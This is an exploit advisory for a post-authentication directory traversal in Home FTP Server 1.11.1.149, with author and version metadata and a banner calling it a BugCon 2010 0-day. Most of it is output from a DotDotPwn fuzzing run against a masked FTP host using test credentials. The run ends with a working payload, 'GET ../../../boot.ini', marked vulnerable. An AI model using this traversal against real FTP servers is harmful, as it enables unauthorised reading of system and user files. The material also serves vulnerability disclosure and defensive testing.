Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal
# Exploit Title: Home FTP Server Directory Traversal
# Date: Oct 28, 2010
# Author: chr1x
# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe
# Description: Home Ftp Server is an easy to use FTP server, that allows you to share files directly from your PC with lots of setup possibilities. You can set up user accounts, specify directory permissions and monitor access to individual files. It supports virtual directories, banned IP addresses and offers a web based administration interface that lets you add users and view current statistics.. and much more.
# Version(s): vr1.10.3 (build 144) AND v r1.11.1 (build 149) <- Yeah, two versions, same payloads! ]¬)
# Tested on: Windows XP SP3 (Spanish Edition)
****************************************************************************************************************************
************************* As 0-day exclusively for the BugCon 2010 Security Conferences! ******************************
************************* http://www.bugcon.org ******************************
****************************************************************************************************************************
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Permuting 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Appending 'boot.ini' to the Traversal Strings
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 1164
[=========== TESTING RESULTS ============]
[+] Ready to launch 40.00 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)
[+] Username: abc123
[+] Password: abc123
[+] Connecting to the FTP server at 'XXX.XXX.X.XX' on port 21
[+] FTP Server's Current Path: /
[+] Local Path to download files: /dotdotpwn-v2.1/retrieved_files
[+] Press any key to continue
[+] Testing ...
.
[*] GET ../../../boot.ini <- VULNERABLE!